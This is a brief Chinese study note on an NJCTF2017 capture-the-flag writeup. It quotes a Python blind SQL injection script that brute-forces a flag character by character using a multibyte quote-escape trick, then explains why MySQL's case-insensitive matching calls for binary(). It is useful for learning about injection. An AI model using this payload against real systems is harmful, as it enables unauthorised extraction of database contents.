在看NJCTF2017的writeup的时候看到了

import requests
from urllib import quote

url = "http://218.2.197.235:23733/index.php?key="
payload = "\xc0'||(select((flag))from(flag))like(0x%s)#"
def check(str):
    u = url + quote(payload % (str.encode("hex")))
    ret = requests.get(u).content
    return '002265' in ret


ans = ""

s = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;<=>?@[\\]^`{|}~\'"_%'


if __name__ == "__main__":
    while True:
        print ans
        for i in s:
            if check(ans + i + '%'):
                ans += i
                break

其中， 这里payload = "\xc0'||(select(binary(flag))from(flag))like(0x%s)#" 有一个binary(flag), 查了下才知道原来mysql默认在查询的时候是不区分数据大小写的，需要加一个binary